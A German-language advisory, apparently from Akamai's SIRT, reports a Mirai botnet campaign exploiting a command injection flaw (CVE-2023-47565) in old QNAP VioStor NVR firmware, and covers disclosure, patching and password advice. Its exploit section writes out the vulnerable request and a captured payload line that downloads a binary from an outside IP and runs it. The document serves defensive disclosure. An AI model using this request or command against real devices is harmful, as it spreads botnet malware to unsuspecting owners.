Aktiv ausgenutzte Schwachstelle in QNAP VioStor NVR: Behoben, Patches verfügbar
Zusammenfassung
Das Security Intelligence Response Team (SIRT) von Akamai hat ein zusätzliches Update zur InfectedSlurs-Kampagne veröffentlicht, da einer der betroffenen Anbieter wichtige Hinweise und Empfehlungen zur Verfügung gestellt hat.
Die Schwachstelle in QNAP wurde im freien Internet entdeckt und erhielt die CVE-ID „CVE-2023-47565“ mit einem CVSS-v3-Score von 8,0.
Die im freien Internet erfassten bösartigen Payloads installieren eine Mirai-basierte Malware mit der Absicht, ein DDoS-Botnet (Distributed Denial of Service) zu erstellen.
Wir haben im ursprünglichen Beitrag eine umfangreiche Liste mit Indicators of Compromise (IOCs), Snort-Regeln und YARA-Regeln zur Identifizierung dieser Exploit-Versuche im freien Internet sowie möglicher aktiver Infektionen in geschützten Netzwerken bereitgestellt.
Was Sie wissen müssen
Im Rahmen der InfectedSlurs-Kampagne hat SIRT eine Sicherheitslücke in QNAP VioStor NVR-Geräten (Network Video Recorder) gefunden, die aktiv ausgenutzt wird. Das NVR-Gerät ist eine leistungsstarke Netzwerküberwachungslösung für die netzwerkbasierte Überwachung von IP-Kameras, Videoaufzeichnung, Wiedergabe und Remote-Datenzugriff. Der Sicherheitsanfälligkeit wurde die CVE-ID „CVE-2023-47565“ mit einem CVSS-v3-Score von 8,0 zugewiesen.
Die Sicherheitslücke ermöglicht es einem authentifizierten Angreifer, eine OS-Befehlsinjektion mit einer Payload zu erreichen, die über eine POST-Anfrage an die Verwaltungsschnittstelle gesendet wird. In seiner aktuellen Konfiguration setzt sie auf die Standardanmeldeinformationen des Geräts in den erfassten Payloads.
Die folgenden Versionen der QNAP VioStor NVR-Firmware sind betroffen:
VioStor NVR: Version 5.0.0 und früher (5.0.0 wurde am 21. Juni 2014 veröffentlicht)
QNAP hat den Support für diese Geräte bereits eingestellt, empfiehlt jedoch, die VioStor-Firmware auf bestehenden Geräten auf die neueste verfügbare Version zu aktualisieren. Dieses Problem wurde bereits gepatcht, obwohl es nie öffentlich gemeldet/offengelegt wurde. Darüber hinaus sollten Nutzer die Standardpasswörter auf ihren Geräten ändern.
Außerdem hat US-CERT einen Hinweis zur Schwachstelle veröffentlicht.
Beobachteter Exploit
Als wir während der InfectedSlurs-Kampagne Exploit-Payloads überprüften, entdeckten wir zunächst nur zwei Zero-Day-Schwachstellen, da das Team den beobachteten Exploit nicht mit einem bestimmten Gerät oder Hersteller verknüpfen konnte. Dadurch war es schwierig, die Zero-Day-Klassifizierung des Exploits zu bestätigen.
Nach einer gründlicheren Untersuchung verschiedener Aspekte der Exploits und Payloads vermutete das SIRT, dass QNAP VioStor NVR-Geräte das Ziel sein könnten. Diese Geräte entsprechen dem Zielgruppenprofil der Kampagne und wurden mit schwachen Standardanmeldedaten ausgeliefert (in ihren Handbüchern zu finden und im Exploit zu beobachten). Wie bei den ersten beiden Zero-Days konnten die infizierten Geräte eine OS-Befehlsinjektion in den NTP-Einstellungen der betroffenen IoT- und NVR-Geräten erleichtern.
Wir haben diese Theorien an US-CERT weitergeleitet, die sich mit dem Akamai SIRT und QNAP koordinierten, um die Beweise zu prüfen und die Theorien des SIRT zu bestätigen. Schließlich bestätigte QNAP, dass die Payloads auf ihre VioStor-Geräte abzielten, die bereits eingestellt und nicht mehr unterstützt werden. Es waren jedoch nur ältere Firmwareversionen (5.0.0 oder früher) betroffen.
Die Schwachstelle wird ausgenutzt, indem ein POST an den Pfad /cgi-bin/server/server.cgi gesendet wurde. Die Remote Code Execution (RCE) befindet sich an der Stelle, an der das Argument für SPECIFIC_SERVER angegeben ist (Abbildung 1).
URL:
/cgi-bin/server/server.cgi?func=server02_main_submit&counter=8.540406879901406&APPLY=
PAYLOAD:
time_mode=2&time_YEAR=0&time_MONTH=0&time_DAY=0&time_HOUR=0&time_MINUTE=0&time_SECOND=0&enable_rtc=1&TIMEZONE=50&year=&month=&day=&CONFIGURE_NTP=on&SPECIFIC_SERVER=[RCE_PAYLOAD]
Abb. 1: Versuchte Ausnutzung des RCE über Command Injection
Abbildung 2 zeigt ein Beispiel für eine erfasste Infektions-Payload.
wget+http://94.156.68.148/zerx86;chmod+777+*;./zerx86+viox86
Abb. 2: Erfasste RCE-Payload
Grundlegende Sicherheitspraktiken sind wichtig
Die Grundlagen sind wichtig. Diese Beobachtungen betonen erneut die Bedeutung grundlegender Best Practices für die Sicherheit, wie z. B. das Ändern von Standardpasswörtern auf Geräten während der Ersteinrichtung. Sie heben auch hervor, wie wichtig es ist, noch strengere langfristige, proaktive Sicherheitsprotokolle zu implementieren, z. B. eine konsistente Aktualisierung der Systeme zum Schutz vor potenziellen Angriffen, und dass die Systeme/Geräte gelegentlich überprüft werden müssen, insbesondere wenn sie ungewöhnliche Verhaltensweisen aufweisen.
Fazit
Auch hier haben wir durch unsere individuelle Bereitstellung von Honeypot-Netzwerken wertvolle Einblicke in Cyberangriffe gewonnen, die bisher unbekannte Schwachstellen aufdecken. Die Standardanmeldedaten und die veralteten, nicht mehr unterstützten Netzwerksysteme haben sich als Schwachstelle für Botnet-Infektionen erwiesen. Veraltete Systeme sind ein Nährboden für neue Schwachstellen, die erkannt und ausgenutzt werden können, um Malware zu verbreiten.
Dieses Ergebnis unterstreicht die entscheidende Bedeutung der Sensibilisierung und Schulung zu Best Practices für IoT-Geräte, wobei die damit verbundenen Risiken für den Verbraucher hervorgehoben werden. Doch es muss nicht nur bei den Verbrauchern Bewusstsein geschaffen werden, sondern auch bei den Herstellern dieser Geräte. Längere Software-Support-Zyklen und Sicherheit bei der Einrichtung, wie z. B. erzwungene Passwortänderungen, sind für die Aufrechterhaltung der Systemsicherheit von entscheidender Bedeutung.
Wir halten Sie auf dem Laufenden
Die Akamai Security Intelligence Group wird Bedrohungen wie diese weiterhin überwachen und darüber berichten, um bei unseren Kunden und in der Sicherheits-Community insgesamt das Bewusstsein für die Gefahren zu schärfen. Wenn sie mehr aus der Bedrohungsforschung erfahren möchten, folgen Sie uns auf X(ehemals Twitter). Dort informieren wir über unsere neuesten Erkenntnisse.
Das Akamai SIRT dankt CISA, US-CERT und QNAP herzlich für ihre Unterstützung bei der Kommunikation, Koordination, Identifizierung, Behebung und Offenlegung..
